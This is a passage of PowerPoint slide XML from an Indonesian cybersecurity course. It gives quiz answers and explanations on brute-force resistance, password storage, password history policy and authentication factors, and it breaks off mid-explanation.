              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diminta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pihak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengandalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>Nb. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>Perhatikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>pengesahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>unik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>unik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>maka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>mudah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>individu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>serius</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>privasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>Sebaliknya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>merek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> dan model </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>tertentu</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70</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3390627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1. Which property of a plaintext password is most effective at defeating a brute force attack?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>👉 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jawaban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Length (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>panjang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> password)</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Penjelasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-ID" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Semakin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>panjang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> password, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semakin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jumlah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemungkinan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kombinasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dicoba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh brute force attacker.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>: 8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karakter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> → 94⁸ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kombinasi</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>12 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karakter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> → 94¹² → </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kompleksitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>panjang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>signifikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melawan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> brute force.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>2. A user maintains a list of commonly used passwords in a file located deep within the computer’s directory structure. Is this secure password management?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>👉 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jawaban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>No.</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dirty="0" err="1"/>
              <a:t>Menyimpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> daftar password </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (plaintext) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meskipun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disimpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam-dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>" di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>File </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diakses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> malware, attacker, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> insider.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>password manager</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>3. What policy prevents users from choosing old passwords again?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>👉 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jawaban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Password history policy.</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dirty="0"/>
              <a:t>Policy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyimpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> hash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> password </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terakhir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>misalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 5 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 10 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terakhir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Saat user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencoba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengganti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> password, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membandingkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> password </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebelumnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> agar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kembali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>4. True or false? An account requiring a password, PIN, and smart card is an example of three-factor authentication.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>👉 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jawaban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>False.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Penjelasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Tiga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>faktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Something you know</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (password </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> PIN)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Something you have</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (smart card, token)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Something you are</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (biometric </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sidik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Password dan PIN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
